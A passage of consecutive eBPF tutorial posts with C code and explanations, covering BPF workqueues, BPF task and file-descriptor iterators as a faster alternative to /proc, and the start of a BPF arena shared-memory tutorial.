/* Userspace test for BPF workqueue */
#include <stdarg.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/resource.h>
#include <bpf/libbpf.h>
#include "wq_simple.skel.h"

static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
{
    return vfprintf(stderr, format, args);
}

int main(int argc, char **argv)
{
    struct wq_simple_bpf *skel;
    int err, fd;

    libbpf_set_print(libbpf_print_fn);

    /* Open and load BPF application */
    skel = wq_simple_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, "Failed to open and load BPF skeleton\n");
        return 1;
    }

    /* Attach the fentry program to do_unlinkat */
    err = wq_simple_bpf__attach(skel);
    if (err) {
        fprintf(stderr, "Failed to attach BPF skeleton\n");
        goto cleanup;
    }

    printf("BPF workqueue program attached. Triggering unlink syscall...\n");

    /* Create a temporary file to trigger do_unlinkat */
    fd = open("/tmp/wq_test_file", O_CREAT | O_WRONLY, 0644);
    if (fd >= 0) {
        close(fd);
        unlink("/tmp/wq_test_file");
    }

    /* Give workqueue time to execute */
    sleep(1);

    /* Check results */
    printf("\nResults:\n");
    printf("  main_executed = %u (expected: 1)\n", skel->bss->main_executed);
    printf("  wq_executed = %u (expected: 1)\n", skel->bss->wq_executed);

    if (skel->bss->main_executed == 1 && skel->bss->wq_executed == 1) {
        printf("\n✓ Test PASSED!\n");
    } else {
        printf("\n✗ Test FAILED!\n");
        err = 1;
    }

cleanup:
    wq_simple_bpf__destroy(skel);
    return err;
}

Understanding the User-Space Code

The userspace program orchestrates the test and verifies results. We use the skeleton API from libbpf, which embeds the compiled BPF bytecode in a C structure, making loading trivial. The wq_simple_bpf__open_and_load() call opens the embedded BPF object, creates all maps, and loads the program into the kernel in one operation; no compilation happens at run time.

After loading, wq_simple_bpf__attach() attaches the fentry program to do_unlinkat. From this point, any unlink syscall will trigger our BPF program. We deliberately trigger this by creating and immediately deleting a temporary file. The open() creates /tmp/wq_test_file, we close the fd, then unlink() deletes it. This deletion enters the kernel's do_unlinkat function, triggering our fentry probe.

Here's the critical timing aspect: workqueue execution is asynchronous. Our main BPF program schedules the work and returns immediately. The kernel queues the callback for later execution by a kernel worker thread. This is why we sleep(1) - giving the workqueue time to execute before we check results. In production code, you'd use more sophisticated synchronization, but for a simple test, sleep is sufficient.
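One modest step up from a fixed sleep is to poll the result flag with a timeout, so the test returns as soon as the callback has run. The helper below is a sketch under stated assumptions: wait_for_flag() and its parameters are hypothetical and not part of libbpf or the tutorial's source.

```c
/* Ask for the POSIX declarations (nanosleep) under strict -std=c11 builds. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stddef.h>
#include <time.h>

/*
 * Poll *flag every interval_ms until it becomes non-zero or roughly
 * timeout_ms has elapsed. Returns 0 if the flag was seen set, -1 on timeout.
 * The name and parameters are assumptions for this sketch.
 */
static int wait_for_flag(const volatile unsigned int *flag,
                         int timeout_ms, int interval_ms)
{
    struct timespec ts = {
        .tv_sec = interval_ms / 1000,
        .tv_nsec = (long)(interval_ms % 1000) * 1000000L,
    };
    int waited = 0;

    while (!*flag) {
        if (waited >= timeout_ms)
            return -1;
        nanosleep(&ts, NULL);
        waited += interval_ms;
    }
    return 0;
}
```

In the test program this could replace sleep(1) with something like wait_for_flag(&skel->bss->wq_executed, 1000, 10). That keeps the one-second upper bound but usually finishes much sooner.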

After the sleep, we read global variables from the BPF program's .bss section. The skeleton provides convenient access through skel->bss->main_executed and skel->bss->wq_executed. If both are 1, we know the synchronous path (fentry) and async path (workqueue callback) both executed successfully.

Understanding Workqueue APIs

The workqueue API consists of three essential functions that manage the lifecycle. bpf_wq_init(wq, map, flags) initializes a workqueue handle, establishing the relationship between the workqueue and its containing map. The map parameter is crucial - it tells the verifier which map contains the value with the embedded bpf_wq structure. The verifier uses this to ensure memory safety across async execution. Flags should be 0 in current kernels.

bpf_wq_set_callback(wq, callback_fn, flags) registers the function to execute asynchronously. The callback must have the signature int callback(void *map, int *key, void *value). The verifier checks this signature at load time and will reject programs with mismatched signatures. This type safety prevents common async programming errors. Flags should be 0.

bpf_wq_start(wq, flags) schedules the workqueue to run. This returns immediately - your BPF program continues executing synchronously. The kernel queues the callback for execution by a worker thread in process context at some point in the future. The callback might run microseconds or milliseconds later depending on system load. Flags should be 0.

The callback signature deserves attention. Unlike bpf_timer callbacks which receive (void *map, __u32 *key, void *value), workqueue callbacks receive (void *map, int *key, void *value). Note the key type difference - int * vs __u32 *. This reflects the evolution of the API and must be matched exactly or the verifier rejects your program. The callback runs in process context, so it can safely perform operations that would crash in softirq context.

When to Use Workqueues vs Timers

Choose bpf_timer when you need microsecond-precision timing, operations are fast and non-blocking, you're updating counters or simple state, or implementing periodic fast-path operations like statistics collection or packet pacing. Timers excel at time-critical tasks that must execute with minimal latency.

Choose bpf_wq when you need to sleep or wait, allocate memory with kzalloc(), perform device or network I/O, or defer cleanup operations that can happen later. Workqueues are perfect for the "fast path + slow path" pattern where critical operations happen immediately and expensive processing runs asynchronously. Examples include HID device I/O (keyboard macro injection with delays), async map cleanup (preventing memory leaks), security policy updates (querying external databases), and background processing (compression, encryption, aggregation).

The fundamental trade-off is latency vs capability. Timers have lower latency but restricted capabilities. Workqueues have higher latency but full process context capabilities including sleeping and blocking I/O.

Compilation and Execution

Navigate to the bpf_wq directory and build:

cd bpf-developer-tutorial/src/features/bpf_wq
make

The Makefile compiles the BPF program with the experimental workqueue features enabled and generates a skeleton header.

Run the simple workqueue test:

sudo ./wq_simple

Expected output:

BPF workqueue program attached. Triggering unlink syscall...

Results:
  main_executed = 1 (expected: 1)
  wq_executed = 1 (expected: 1)

✓ Test PASSED!

The test verifies that both the synchronous fentry probe and the asynchronous workqueue callback executed successfully. If the workqueue callback didn't run, wq_executed would be 0 and the test would fail.

Historical Timeline and Context

Understanding how workqueues came to exist helps appreciate their design. In 2022, Benjamin Tissoires started work on HID-BPF, aiming to let users fix broken HID devices without kernel drivers. By 2023, he realized bpf_timer limitations made HID device I/O impossible - you can't wait for hardware responses in softirq context. In early 2024, he proposed bpf_wq as "bpf_timer in process context," collaborating with the BPF community on the design. The kernel merged workqueues in April 2024 as part of Linux v6.10. Since then, they've been used for HID quirks, rate limiting, async cleanup, and other sleepable operations.

The key quote from Benjamin's patches captures the motivation perfectly: "I need something similar to bpf_timers, but not in soft IRQ context... the bpf_timer functionality would prevent me to kzalloc and wait for the device."

This real-world need drove the design. Workqueues exist because device handling and resource management require sleepable, blocking operations that timers fundamentally cannot provide.

Summary and Next Steps

BPF workqueues solve a fundamental limitation of eBPF by enabling sleepable, blocking operations in process context. Created specifically to support HID device handling where timing delays and device I/O are essential, workqueues unlock powerful new capabilities for eBPF programs. They enable the "fast path + slow path" pattern where performance-critical operations execute immediately while expensive cleanup and I/O happen asynchronously without blocking.

Our simple example demonstrates the core workqueue lifecycle: embedding a bpf_wq in a map value, initializing and configuring it, scheduling async execution, and verifying the callback runs in process context. This same pattern scales to production use cases like network rate limiting with async cleanup, security monitoring with external service queries, and device handling with I/O operations.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Original Kernel Patches: Benjamin Tissoires' HID-BPF and bpf_wq patches (2023-2024)
Linux Kernel Source: kernel/bpf/helpers.c - workqueue implementation
Tutorial Repository: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq

Example adapted from Linux kernel BPF selftests with educational enhancements. Requires Linux kernel 6.10+ for workqueue support. Complete source code available in the tutorial repository.

eBPF Tutorial: BPF Iterators for Kernel Data Export

云微 — Tue, 13 Jan 2026 07:18:49 +0000

Ever tried monitoring hundreds of processes and ended up parsing thousands of /proc files just to find the few you care about? Or needed custom formatted kernel data but didn't want to modify the kernel itself? Traditional /proc filesystem access is slow, inflexible, and forces you to process tons of data in userspace even when you only need a small filtered subset.

This is what BPF Iterators solve. Introduced in Linux kernel 5.8, iterators let you traverse kernel data structures directly from BPF programs, apply filters in-kernel, and output exactly the data you need in any format you want. In this tutorial, we'll build a dual-mode iterator that shows kernel stack traces and open file descriptors for processes, with in-kernel filtering by process name - dramatically faster than parsing /proc.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters

Introduction to BPF Iterators: The /proc Replacement

The Problem: /proc is Slow and Rigid

Traditional Linux monitoring revolves around the /proc filesystem. Need to see what processes are doing? Read /proc/*/stack. Want open files? Parse /proc/*/fd/*. This works, but it's painfully inefficient when you're monitoring systems at scale or need specific filtered views of kernel data.

The performance problem is systemic. Every /proc access requires a syscall, kernel mode transition, text formatting, data copy to userspace, and then you parse that text back into structures. If you want stack traces for all "bash" processes among 1000 total processes, you still read all 1000 /proc/*/stack files and filter in userspace. That's 1000 syscalls, 1000 text parsing operations, and megabytes of data transferred just to find a handful of matches.

Format inflexibility compounds the problem. The kernel chooses what data to show and how to format it. Want stack traces with custom annotations? Too bad, you get the kernel's fixed format. Need to aggregate data across processes? Parse everything in userspace. The /proc interface is designed for human consumption, not programmatic filtering and analysis.

Here's what traditional monitoring looks like:

# Find stack traces for all bash processes
for pid in $(pgrep bash); do
  echo "=== PID $pid ==="
  cat /proc/$pid/stack
done

This spawns pgrep as a subprocess, makes a syscall per matching PID to read stack files, parses text output, and does all filtering in userspace. Simple to write, horrible for performance.

The Solution: Programmable In-Kernel Iteration

BPF iterators flip the model. Instead of pulling all data to userspace for processing, you push your processing logic into the kernel where the data lives. An iterator is a BPF program attached to a kernel data structure traversal that gets called for each element. The kernel walks tasks, files, or sockets, invokes your BPF program with each element's context, and your code decides what to output and how to format it.

The architecture is elegant. You write a BPF program marked SEC("iter/task") or SEC("iter/task_file") that receives each task or file during iteration. Inside this program, you have direct access to kernel struct fields, can filter based on any criteria using normal C logic, and use BPF_SEQ_PRINTF() to format output exactly as needed. The kernel handles the iteration mechanics while your code focuses purely on filtering and formatting.

When userspace reads from the iterator file descriptor, the magic happens entirely in the kernel. The kernel walks the task list, calls your BPF program for each task passing the task_struct pointer. Your program checks if the task name matches your filter - if not, it returns 0 immediately with no output. If it matches, your program extracts the stack trace and formats it to a seq_file. All this happens in kernel context before any data crosses to userspace.
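The name check at the heart of that filter is a bounded byte-by-byte comparison. Here is a userspace sketch of the same logic that can be compiled and tested outside the kernel. comm_matches() is a hypothetical name, and TASK_COMM_LEN is defined locally to mirror the kernel's 16-byte comm field.

```c
#define TASK_COMM_LEN 16

/*
 * Return 1 if a task named task_comm should be reported, 0 otherwise.
 * An empty target means "no filter". The loop is bounded by TASK_COMM_LEN,
 * the kind of fixed bound the BPF verifier can reason about, and it
 * matches only when both strings are equal up to the terminator.
 */
static int comm_matches(const char *task_comm, const char *target)
{
    if (target[0] == '\0')
        return 1;

    for (int i = 0; i < TASK_COMM_LEN; i++) {
        if (task_comm[i] != target[i])
            return 0;
        if (task_comm[i] == '\0')
            return 1;
    }
    /* No terminator within 16 bytes: treated as no match. */
    return 0;
}
```

Because the comparison stops at the first differing byte, a non-matching task usually costs only a byte or two of work, which is part of why in-kernel filtering is cheap.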

The benefits are transformative. In-kernel filtering means only relevant data crosses the kernel boundary, eliminating wasted work. Custom formats let you output binary, JSON, CSV, or whatever your tools need. A single read operation replaces thousands of individual /proc file accesses. Userspace does no parsing because the data was already formatted in the kernel. And because iterator output comes through a normal file descriptor, it composes with standard Unix tools.

Iterator Types and Capabilities

The kernel provides iterators for many subsystems. Task iterators (iter/task) walk all tasks giving you access to process state, credentials, resource usage, and parent-child relationships. File iterators (iter/task_file) traverse open file descriptors showing files, sockets, pipes, and other fd types. Network iterators (iter/tcp, iter/udp) walk active network connections with full socket state. BPF object iterators (iter/bpf_map, iter/bpf_prog) enumerate loaded BPF programs and maps for introspection.

Our tutorial focuses on task and task_file iterators because they solve common monitoring needs and demonstrate core concepts applicable to all iterator types.

Implementation: Dual-Mode Task Iterator

Let's build a complete example demonstrating two iterator types in one tool. We'll create a program that can show either kernel stack traces or open file descriptors for processes, with optional filtering by process name.

Complete BPF Program: task_stack.bpf.c

// SPDX-License-Identifier: GPL-2.0
/* Kernel task stack and file descriptor iterator */
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>

char _license[] SEC("license") = "GPL";

#define MAX_STACK_TRACE_DEPTH   64
unsigned long entries[MAX_STACK_TRACE_DEPTH] = {};
#define SIZE_OF_ULONG (sizeof(unsigned long))

/* Filter: only show stacks for tasks with this name (empty = show all) */
char target_comm[16] = "";
__u32 stacks_shown = 0;
__u32 files_shown = 0;

/* Task stack iterator */
SEC("iter/task")
int dump_task_stack(struct bpf_iter__task *ctx)
{
    struct seq_file *seq = ctx->meta->seq;
    struct task_struct *task = ctx->task;
    long i, retlen;
    int match = 1;

    if (task == (void *)0) {
        /* End of iteration - print summary */
        if (stacks_shown > 0) {
            BPF_SEQ_PRINTF(seq, "\n=== Summary: %u task stacks shown ===\n",
                       stacks_shown);
        }
        return 0;
    }

    /* Filter by task name if specified */
    if (target_comm[0] != '\0') {
        match = 0;
        for (i = 0; i < 16; i++) {
            if (task->comm[i] != target_comm[i])
                break;
            if (task->comm[i] == '\0') {
                match = 1;
                break;
            }
        }
        if (!match)
            return 0;
    }

    /* Get kernel stack trace for this task */
    retlen = bpf_get_task_stack(task, entries,
                    MAX_STACK_TRACE_DEPTH * SIZE_OF_ULONG, 0);
    if (retlen < 0)
        return 0;

    stacks_shown++;

    /* Print task info and stack trace */
    BPF_SEQ_PRINTF(seq, "=== Task: %s (pid=%u, tgid=%u) ===\n",
               task->comm, task->pid, task->tgid);
    BPF_SEQ_PRINTF(seq, "Stack depth: %u frames\n", retlen / SIZE_OF_ULONG);

    for (i = 0; i < MAX_STACK_TRACE_DEPTH; i++) {
        if (retlen > i * SIZE_OF_ULONG)
            BPF_SEQ_PRINTF(seq, "  [%2ld] %pB\n", i, (void *)entries[i]);
    }
    BPF_SEQ_PRINTF(seq, "\n");

    return 0;
}

/* Task file descriptor iterator */
SEC("iter/task_file")
int dump_task_file(struct bpf_iter__task_file *ctx)
{
    struct seq_file *seq = ctx->meta->seq;
    struct task_struct *task = ctx->task;
    struct file *file = ctx->file;
    __u32 fd = ctx->fd;
    long i;
    int match = 1;

    if (task == (void *)0 || file == (void *)0) {
        if (files_shown > 0 && ctx->meta->seq_num > 0) {
            BPF_SEQ_PRINTF(seq, "\n=== Summary: %u file descriptors shown ===\n",
                       files_shown);
        }
        return 0;
    }

    /* Filter by task name if specified */
    if (target_comm[0] != '\0') {
        match = 0;
        for (i = 0; i < 16; i++) {
            if (task->comm[i] != target_comm[i])
                break;
            if (task->comm[i] == '\0') {
                match = 1;
                break;
            }
        }
        if (!match)
            return 0;
    }

    if (ctx->meta->seq_num == 0) {
        BPF_SEQ_PRINTF(seq, "%-16s %8s %8s %6s %s\n",
                   "COMM", "TGID", "PID", "FD", "FILE_OPS");
    }

    files_shown++;

    BPF_SEQ_PRINTF(seq, "%-16s %8d %8d %6d 0x%lx\n",
               task->comm, task->tgid, task->pid, fd,
               (long)file->f_op);

    return 0;
}

Understanding the BPF Code

The program implements two separate iterators sharing common filtering logic. The SEC("iter/task") annotation registers dump_task_stack as a task iterator - the kernel will call this function once for each task in the system. The context structure bpf_iter__task provides two fields: meta, which carries iteration metadata and the seq_file used for output, and task, which points to the current task_struct. After the last task, the kernel calls the program one final time with task set to NULL so you can print summaries.

The task stack iterator shows in-kernel filtering in action. When task is NULL, we've reached the end of iteration and can print summary statistics showing how many tasks matched our filter. For each task, we first apply filtering by comparing task->comm (the process name) against target_comm. We can't use standard library functions like strcmp() in BPF, so we manually loop through characters comparing byte by byte. If the names don't match and filtering is enabled, we immediately return 0 with no output - this task is skipped entirely in the kernel without crossing to userspace.
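The comparison loop is easy to misread as a prefix match, so here is a minimal user-space sketch of the same logic, assuming the 16-byte comm buffers used in the BPF program. The name comm_matches() is hypothetical and is not part of the tutorial code. It shows that the filter is an exact match: a target of "bash" accepts "bash" but rejects "bash-x" and "ba".

```c
#include <assert.h>
#include <stddef.h>

#define TASK_COMM_LEN 16 /* size of task->comm in the kernel */

/*
 * User-space mirror of the BPF filter loop (hypothetical helper).
 * Returns 1 only when comm and target are identical up to and
 * including the terminating NUL. An empty target disables filtering,
 * as in the BPF program.
 */
static int comm_matches(const char comm[TASK_COMM_LEN],
                        const char target[TASK_COMM_LEN])
{
    assert(comm != NULL && target != NULL);

    if (target[0] == '\0')
        return 1; /* no filter configured: every task matches */

    for (size_t i = 0; i < TASK_COMM_LEN; i++) {
        if (comm[i] != target[i])
            return 0; /* first differing byte: different name */
        if (comm[i] == '\0')
            return 1; /* both strings ended together: exact match */
    }
    return 0; /* no NUL within 16 bytes: treated as no match */
}
```

Calling comm_matches(task_name, filter) with two zero-padded 16-byte buffers reproduces the decision the iterator makes for each task.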

Once a task passes filtering, we extract its kernel stack trace using bpf_get_task_stack(). This BPF helper captures up to 64 stack frames into our entries array, returning the number of bytes written. We format the output using BPF_SEQ_PRINTF() which writes to the kernel's seq_file infrastructure. The special %pB format specifier symbolizes kernel addresses, turning raw pointers into human-readable function names like schedule+0x42/0x100. This makes stack traces immediately useful for debugging.

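The file descriptor iterator demonstrates a different iterator type. SEC("iter/task_file") tells the kernel to call this function for every open file descriptor across all tasks. The context provides task, file (the kernel's struct file pointer), and fd (the numeric file descriptor). We apply the same task name filtering, then format output as a table. The column headers are printed when ctx->meta->seq_num is 0, that is, for the first descriptor the kernel visits. Be aware that seq_num counts visited descriptors whether or not they pass the filter, so with a name filter the header only appears if that very first descriptor belongs to a matching task; keying the header on files_shown == 0 instead would print it before the first matching row.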

Notice how filtering happens before any expensive operations. We check the task name first, and only if it matches do we extract stack traces or format file information. This minimizes work in the kernel fast path - non-matching tasks are rejected with just a string comparison, no memory allocation, no formatting, no output.

Complete User-Space Program: task_stack.c

// SPDX-License-Identifier: GPL-2.0
/* Userspace program for task stack and file iterator */
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h>
#include "task_stack.skel.h"

static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
{
    return vfprintf(stderr, format, args);
}

static void run_iterator(const char *name, struct bpf_program *prog)
{
    struct bpf_link *link;
    int iter_fd, len;
    char buf[8192];

    link = bpf_program__attach_iter(prog, NULL);
    if (!link) {
        fprintf(stderr, "Failed to attach %s iterator\n", name);
        return;
    }

    iter_fd = bpf_iter_create(bpf_link__fd(link));
    if (iter_fd < 0) {
        fprintf(stderr, "Failed to create %s iterator: %d\n", name, iter_fd);
        bpf_link__destroy(link);
        return;
    }

    while ((len = read(iter_fd, buf, sizeof(buf) - 1)) > 0) {
        buf[len] = '\0';
        printf("%s", buf);
    }

    close(iter_fd);
    bpf_link__destroy(link);
}

int main(int argc, char **argv)
{
    struct task_stack_bpf *skel;
    int err;
    int show_files = 0;

    libbpf_set_print(libbpf_print_fn);

    /* Parse arguments */
    if (argc > 1 && strcmp(argv[1], "--files") == 0) {
        show_files = 1;
        argc--;
        argv++;
    }

    /* Open BPF application */
    skel = task_stack_bpf__open();
    if (!skel) {
        fprintf(stderr, "Failed to open BPF skeleton\n");
        return 1;
    }

    /* Configure filter before loading */
    if (argc > 1) {
        strncpy(skel->bss->target_comm, argv[1], sizeof(skel->bss->target_comm) - 1);
        printf("Filtering for tasks matching: %s\n\n", argv[1]);
    } else {
        printf("Usage: %s [--files] [comm]\n", argv[0]);
        printf("  --files    Show open file descriptors instead of stacks\n");
        printf("  comm       Filter by process name\n\n");
    }

    /* Load BPF program */
    err = task_stack_bpf__load(skel);
    if (err) {
        fprintf(stderr, "Failed to load BPF skeleton\n");
        goto cleanup;
    }

    if (show_files) {
        printf("=== BPF Task File Descriptor Iterator ===\n\n");
        run_iterator("task_file", skel->progs.dump_task_file);
    } else {
        printf("=== BPF Task Stack Iterator ===\n\n");
        run_iterator("task", skel->progs.dump_task_stack);
    }

cleanup:
    task_stack_bpf__destroy(skel);
    return err;
}

Understanding the User-Space Code

The userspace program showcases how simple iterator usage is once you understand the pattern. The run_iterator() function encapsulates the three-step iterator lifecycle. First, bpf_program__attach_iter() attaches the BPF program to the iterator infrastructure, registering it to be called during iteration. Second, bpf_iter_create() creates a file descriptor representing an iterator instance. Third, simple read() calls consume the iterator output.

Here's what makes this powerful: when you read from the iterator fd, the kernel transparently starts walking tasks or files. For each element, it calls your BPF program passing the element's context. Your BPF code filters and formats output to a seq_file buffer. The kernel accumulates this output and returns it through the read() call. From userspace's perspective, it's just reading a file - all the iteration, filtering, and formatting complexity is hidden in the kernel.
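Since the iterator looks like an ordinary file to userspace, the read loop can be written once and reused for any descriptor. The sketch below is an illustration under that assumption; drain_fd() is a hypothetical helper, not a libbpf function. It copies everything from one descriptor to another until EOF, retries on EINTR, and uses write() rather than printf("%s"), so output containing NUL bytes (for example a binary format) is not cut short.

```c
#include <assert.h>
#include <errno.h>
#include <unistd.h>

/*
 * Copy everything readable from in_fd to out_fd until EOF.
 * Returns the number of bytes copied, or -1 on a read/write error.
 * in_fd can be an iterator fd, a pipe, or a regular file.
 */
static long drain_fd(int in_fd, int out_fd)
{
    char buf[4096];
    long total = 0;

    assert(in_fd >= 0 && out_fd >= 0);

    for (;;) {
        ssize_t len = read(in_fd, buf, sizeof(buf));

        if (len == 0)
            break;              /* EOF: nothing left to iterate */
        if (len < 0) {
            if (errno == EINTR)
                continue;       /* interrupted by a signal: retry */
            return -1;
        }
        /* write() may be partial, so loop until the chunk is out */
        for (ssize_t off = 0; off < len; ) {
            ssize_t n = write(out_fd, buf + off, (size_t)(len - off));

            if (n < 0) {
                if (errno == EINTR)
                    continue;
                return -1;
            }
            off += n;
        }
        total += len;
    }
    return total;
}
```

In the tutorial's run_iterator(), a call such as drain_fd(iter_fd, STDOUT_FILENO) could stand in for the while loop around read() and printf().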

The main function handles mode selection and configuration. We parse command-line arguments to determine whether to show stacks or files, and what process name to filter for. Critically, we set skel->bss->target_comm before loading the BPF program. This writes the filter string into the BPF program's global data section, making it visible to kernel code when the program runs. This is how we pass configuration from userspace to kernel without complex communication channels.
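The strncpy() call in main() relies on the .bss buffer starting out zeroed, and it silently truncates names longer than 15 characters. The following sketch makes both points explicit. It is a stand-alone illustration, and set_comm_filter() is a hypothetical name rather than part of the tutorial. Truncating to 15 characters is harmless here because the kernel stores task names in a 16-byte comm field as well.

```c
#include <assert.h>
#include <string.h>

#define TASK_COMM_LEN 16 /* size of task->comm in the kernel */

/*
 * Copy a user-supplied process name into a 16-byte filter buffer.
 * The buffer is zero-filled first, so the result is always
 * NUL-terminated and NUL-padded. Returns 1 if the name had to be
 * truncated to 15 characters, 0 otherwise.
 */
static int set_comm_filter(char dst[TASK_COMM_LEN], const char *name)
{
    size_t len;

    assert(dst != NULL && name != NULL);

    len = strlen(name);
    memset(dst, 0, TASK_COMM_LEN);
    memcpy(dst, name, len < TASK_COMM_LEN - 1 ? len : TASK_COMM_LEN - 1);
    return len > TASK_COMM_LEN - 1;
}
```

With a skeleton in hand, this would be called as set_comm_filter(skel->bss->target_comm, argv[1]) before loading, and the return value could drive a warning that the filter was shortened.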

After loading, we select which iterator to run based on the --files flag. Both iterators use the same filtering logic, but produce different output - one shows stack traces, the other shows file descriptors. The shared filtering code demonstrates how BPF programs can implement reusable logic across different iterator types.

Compilation and Execution

Navigate to the bpf_iters directory and build:

cd bpf-developer-tutorial/src/features/bpf_iters
make

The Makefile compiles the BPF program with BTF support and generates a skeleton header containing the compiled bytecode embedded in C structures. This skeleton API makes BPF program loading trivial.

Show kernel stack traces for all systemd processes:

sudo ./task_stack systemd

Expected output:

Filtering for tasks matching: systemd

=== BPF Task Stack Iterator ===

=== Task: systemd (pid=1, tgid=1) ===
Stack depth: 6 frames
  [ 0] ep_poll+0x447/0x460
  [ 1] do_epoll_wait+0xc3/0xe0
  [ 2] __x64_sys_epoll_wait+0x6d/0x110
  [ 3] x64_sys_call+0x19b1/0x2310
  [ 4] do_syscall_64+0x7e/0x170
  [ 5] entry_SYSCALL_64_after_hwframe+0x76/0x7e

=== Summary: 1 task stacks shown ===

Show open file descriptors for bash processes:

sudo ./task_stack --files bash

Expected output:

Filtering for tasks matching: bash

=== BPF Task File Descriptor Iterator ===

COMM                 TGID      PID     FD FILE_OPS
bash                12345    12345      0 0xffffffff81e3c6e0
bash                12345    12345      1 0xffffffff81e3c6e0
bash                12345    12345      2 0xffffffff81e3c6e0
bash                12345    12345    255 0xffffffff82145dc0

=== Summary: 4 file descriptors shown ===

Run without filtering to see all tasks:

sudo ./task_stack

This shows stacks for every task in the system. On a typical desktop, this might display hundreds of tasks. The whole walk is served by a handful of read() calls on one file descriptor, whereas parsing /proc/*/stack needs an open/read/close cycle per process plus text parsing in userspace.

When to Use BPF Iterators vs /proc

Choose BPF iterators when you need filtered kernel data without userspace processing overhead, custom output formats that don't match /proc text, performance-critical monitoring that runs frequently, or integration with BPF-based observability infrastructure. Iterators excel when you're monitoring many entities but only care about a subset, or when you need to aggregate and transform data in the kernel.

Choose /proc when you need simple one-off queries, are debugging or prototyping where development speed matters more than runtime performance, want maximum portability across kernel versions (iterators require relatively recent kernels), or run in restricted environments where you can't load BPF programs.

The fundamental trade-off is processing location. Iterators push filtering and formatting into the kernel for efficiency and flexibility, while /proc keeps the kernel simple and does all processing in userspace. For production monitoring of complex systems, iterators usually win due to their performance benefits and programming flexibility.

Summary and Next Steps

BPF iterators revolutionize how we export kernel data by enabling programmable, filtered iteration directly from BPF code. Instead of repeatedly reading and parsing /proc files, you write a BPF program that iterates kernel structures in-kernel, applies filtering at the source, and formats output exactly as needed. This eliminates massive overhead from syscalls, mode transitions, and userspace parsing while providing complete flexibility in output format.

Our dual-mode iterator demonstrates both task and file iteration, showing how one BPF program can export multiple views of kernel data with shared filtering logic. The kernel handles complex iteration mechanics while your BPF code focuses purely on filtering and formatting. Iterators integrate seamlessly with standard Unix tools through their file descriptor interface, making them composable building blocks for sophisticated monitoring pipelines.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

BPF Iterator Documentation: https://docs.kernel.org/bpf/bpf_iterators.html
Kernel Iterator Selftests: Linux kernel tree tools/testing/selftests/bpf/*iter*.c
Tutorial Repository: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters
libbpf Iterator API: https://github.com/libbpf/libbpf
BPF Helpers Manual: https://man7.org/linux/man-pages/man7/bpf-helpers.7.html

Examples adapted from Linux kernel BPF selftests with educational enhancements. Requires Linux kernel 5.8+ for iterator support, BTF enabled, and libbpf. Complete source code available in the tutorial repository.

eBPF Tutorial by Example: BPF Arena for Zero-Copy Shared Memory

云微 — Tue, 06 Jan 2026 07:19:17 +0000

Ever tried building a linked list in eBPF and got stuck using awkward integer indices instead of real pointers? Or needed to share large amounts of data between your kernel BPF program and userspace without expensive syscalls? Traditional BPF maps force you to work around pointer limitations and require system calls for every access. What if you could just use normal C pointers and have direct memory access from both kernel and userspace?

This is what BPF Arena solves. Created by Alexei Starovoitov in 2024, arena provides a sparse shared memory region where BPF programs can use real pointers to build complex data structures like linked lists, trees, and graphs, while userspace gets zero-copy direct access to the same memory. In this tutorial, we'll build a linked list in arena memory and show you how both kernel and userspace can manipulate it using standard pointer operations.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena

Introduction to BPF Arena: Breaking Free from Map Limitations

The Problem: When BPF Maps Aren't Enough

Traditional BPF maps are fantastic for simple key-value storage, but they have fundamental limitations when you need complex data structures or large-scale data sharing. Let's look at what developers faced before arena existed.

Ring buffers only work in one direction - BPF can send data to userspace, but userspace can't write back. They're streaming-only, no random access. Hash maps require a syscall such as bpf_map_lookup_elem() for every access from userspace, and so do array maps unless they are created with BPF_F_MMAPABLE. Array maps allocate all their memory upfront, wasting space if you only use a fraction of entries. Most critically, you can't use real pointers - you're forced to use integer indices to link data structures together.

Building a linked list the old way looked like this mess:

struct node {
    int next_idx;  // Can't use pointers, must use index!
    int data;
};

struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, 10000);
    __type(value, struct node);
} nodes_map SEC(".maps");

// Traverse requires repeated map lookups
int idx = head_idx;
while (idx != -1) {
    struct node *n = bpf_map_lookup_elem(&nodes_map, &idx);
    if (!n) break;
    process(n->data);
    idx = n->next_idx;  // No pointer following!
}

Every node access requires a map lookup. You can't just follow pointers like normal C code. The verifier won't let you use pointers across different map entries. This makes implementing trees, graphs, or any pointer-based structure incredibly awkward and slow.

The Solution: Sparse Shared Memory with Real Pointers

In 2024, Alexei Starovoitov from the Linux kernel team introduced BPF arena to solve these limitations. Arena provides a sparse shared memory region between BPF programs and userspace, supporting up to 4GB of address space. Memory pages are allocated on-demand as you use them, so you don't waste space. Both kernel BPF code and userspace programs can map the same arena and access it directly.

The game-changer: you can use real C pointers in BPF programs targeting arena memory. The __arena annotation tells the verifier that these pointers reference arena space, and special address space casts (cast_kern(), cast_user()) let you safely convert between kernel and userspace views of the same memory. Userspace gets zero-copy access through mmap() - no syscalls needed to read or write arena data.

Here's what the same linked list looks like with arena:

struct node {
    struct node __arena *next;  // Real pointer!
    int data;
};

struct node __arena *head;

// Traverse with normal pointer following
struct node __arena *n = head;
while (n) {
    process(n->data);
    n = n->next;  // Just follow the pointer!
}

Clean, simple, exactly how you'd write it in normal C. The verifier understands arena pointers and lets you dereference them safely.

Why This Matters

Arena was inspired by research showing the potential for complex data structures in BPF. Before arena, developers were building hash tables, queues, and trees using giant BPF array maps with integer indices instead of pointers. It worked, but the code was ugly and slow. Arena unlocks several powerful use cases.

